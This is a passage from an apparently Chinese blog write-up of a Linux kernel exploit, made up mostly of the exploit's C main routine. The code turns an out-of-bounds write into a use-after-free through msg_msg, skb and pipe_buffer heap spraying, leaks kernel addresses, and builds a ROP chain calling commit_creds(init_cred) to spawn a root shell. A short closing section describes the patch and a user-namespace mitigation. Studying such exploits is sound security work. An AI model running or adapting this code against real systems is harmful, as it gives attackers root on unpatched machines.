{
perror("socketpair");
return -1;
}
}
puts("[*] Setup message queues");
memset(msqid, -1, sizeof(msqid));
for (int i = 0; i < NUM_MSQIDS; i++)
{
if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0)
{
goto ret;
}
}
puts("[*] Spraying primary messages...");
for (int i = 0; i < NUM_MSQIDS; i++)
{
memset(&msg_primary, 0, sizeof(msg_primary));
*(int *)&msg_primary.mtext[0] = MSG_TAG;
*(int *)&msg_primary.mtext[4] = i;
if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
{
goto ret;
}
}
puts("[*] Spraying secondary messages...");
for (int i = 0; i < NUM_MSQIDS; i++)
{
memset(&msg_secondary, 0, sizeof(msg_secondary));
*(int *)&msg_secondary.mtext[0] = MSG_TAG;
*(int *)&msg_secondary.mtext[4] = i;
if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
goto ret;
}
puts("[*] Creating holes in primary messages...");
for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP)
{
if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
goto ret;
}
puts("[*] Trigger oob write");
if (trigger_oob_write(s) < 0)
goto ret;
puts("[*] Searching for corrupted primary message...");
for (int i = 0; i < NUM_MSQIDS; i++)
{
if (i != 0 && !(i % HOLE_STEP))
continue;
if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
goto ret;
if (*(int *)&msg_secondary.mtext[0] != MSG_TAG)
{
printf("[-] MSG_TAG error\n");
goto ret;
}
if (*(int *)&msg_secondary.mtext[4] != i)
{
real_id = *(int *)&msg_secondary.mtext[4];
fake_id = i;
break;
}
}
if (real_id == -1 && fake_id == -1)
{
printf("[-] Could not corrupt any primary message\n");
goto ret;
}
printf("[+] real_id = %#x, fake_id = %#x\n", real_id, fake_id);
puts("[*] Free secondary message and then gain UAF");
if (read_msg(msqid[real_id], &msg_secondary, sizeof(msg_secondary), MTYPE_SECONDARY) < 0)
goto ret;
puts("[*] Spraying fake secondary messages...");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, PAGE_SIZE - MSG_MSG_SIZE, 0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Leaking adjacent secondary message...");
if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
goto ret;
if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG)
{
printf("[-] Could not leak adjacent secondary message");
goto ret;
}
msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
kheap = msg->m_list_next; // kheap pointer to the primary message
if (kheap & (PRIMARY_SIZE - 1))
kheap = msg->m_list_prev;
printf("[+] kheap = %#" PRIx64 "\n", kheap);
puts("[*] Freeing skb...");
if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Spraying fake secondary messages...");
memset(secondary_buf, 0, sizeof(secondary_buf));
build_msg_msg((struct msg_msg *)secondary_buf, 0x41414141, 0x42424242, sizeof(msg_fake.mtext), kheap - MSG_MSGSEG_SIZE);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Leaking address of msg_fake");
if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
goto ret;
if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG)
{
printf("[-] Could not leak address of msg_fake\n");
goto ret;
}
msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE];
msg_fake_addr = msg->m_list_next;
if (msg_fake_addr & (SECONDARY_SIZE - 1))
msg_fake_addr = msg->m_list_prev;
msg_fake_addr -= SECONDARY_SIZE;
printf("[+] address of msg_fake = %#" PRIx64 "\n", msg_fake_addr);
puts("[*] Free secondary message and then gain UAF controlled by skb");
if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
build_msg_msg((struct msg_msg *)secondary_buf, msg_fake_addr, msg_fake_addr, 0, 0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
if (read_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
goto ret;
puts("[*] Spraying pipe_buffer objects...");
for (int i = 0; i < NUM_PIPEFDS; i++)
{
if (pipe(pipefd[i]) < 0)
{
perror("[-] pipe");
goto ret;
}
if (write(pipefd[i][1], "xi4oyu", 6) < 0)
{
perror("[-] write");
goto ret;
}
}
puts("[*] Leaking and freeing pipe_buffer object...");
for (int i = 0; i < NUM_SOCKETS; i++)
{
for (int j = 0; j < NUM_SKBUFFS; j++)
{
if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0)
{
perror("[-] read");
goto ret;
}
if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE)
{
pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];
// break; // free all
}
}
}
kernel_offset = pipe_buffer_ops - 0xffffffff8223e140; // anon_pipe_buf_ops
kernel_base = kernel_offset + 0xffffffff81000000;
printf("[+] pipe_buffer_ops = %#" PRIx64 "\n", pipe_buffer_ops);
printf("[+] kernel_base = %#" PRIx64 "\n", kernel_base);
printf("[+] kernel_offset = %#" PRIx64 "\n", kernel_offset);
puts("[*] Spraying fake pipe_buffer...");
memset(secondary_buf, 0, sizeof(secondary_buf));
buf = (struct pipe_buffer *)secondary_buf;
buf->ops = msg_fake_addr + 0x200;
ops = (struct pipe_buf_operations *)&secondary_buf[0x200];
ops->release = kernel_offset + 0xffffffff8172e1ac; // push rsi ; jmp qword ptr [rsi + 0x39]
*(uint64_t *)&secondary_buf[0] = kernel_offset + 0xffffffff8106f8c9; // add rsp, 0xd0 ; ret
*(uint64_t *)&secondary_buf[0x39] = kernel_offset + 0xffffffff81163ea0; // pop rsp ; ret
rop = (uint64_t *)&secondary_buf[0xd0 + 8];
ridx = 0;
rop[ridx++] = kernel_offset + 0xffffffff8108c650; // pop rdi ; ret
rop[ridx++] = kernel_offset + 0xffffffff8286b780; // init_cred
rop[ridx++] = kernel_offset + 0xffffffff810c9f00; // commit_creds
rop[ridx++] = kernel_offset + 0xffffffff8108c5bc; // mov rsp, rbp ; pop rbp ; ret
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Releasing pipe_buffer objects...");
for (int i = 0; i < NUM_PIPEFDS; i++)
{
if (close(pipefd[i][0]) < 0)
{
perror("[-] close");
goto ret;
}
if (close(pipefd[i][1]) < 0)
{
perror("[-] close");
goto ret;
}
}
getRootShell();
ret:
for (int i = 0; i < NUM_MSQIDS; i++)
{
if (msqid[i] < 0)
continue;
if (msgctl(msqid[i], IPC_RMID, NULL) < 0)
perror("[-] msgctl rmid");
}
return 0;
}
漏洞修复
漏洞的修复很粗暴,就直接把 memset 这部分给去掉了,具体看 patch
还有个缓解措施是,禁用用户命名空间的功能来阻止普通用户拿到 CAP_NET_ADMIN
权限,参考:
echo 0 > /proc/sys/user/max_user_namespaces
总结
从溢出写 0 到 UAF 这里非常的巧妙,随后的 skb 和 pipe_buffer 结合利用 UAF 的思路应该是十分具备参考性的,非常值得学习
文中未明确提到的参考: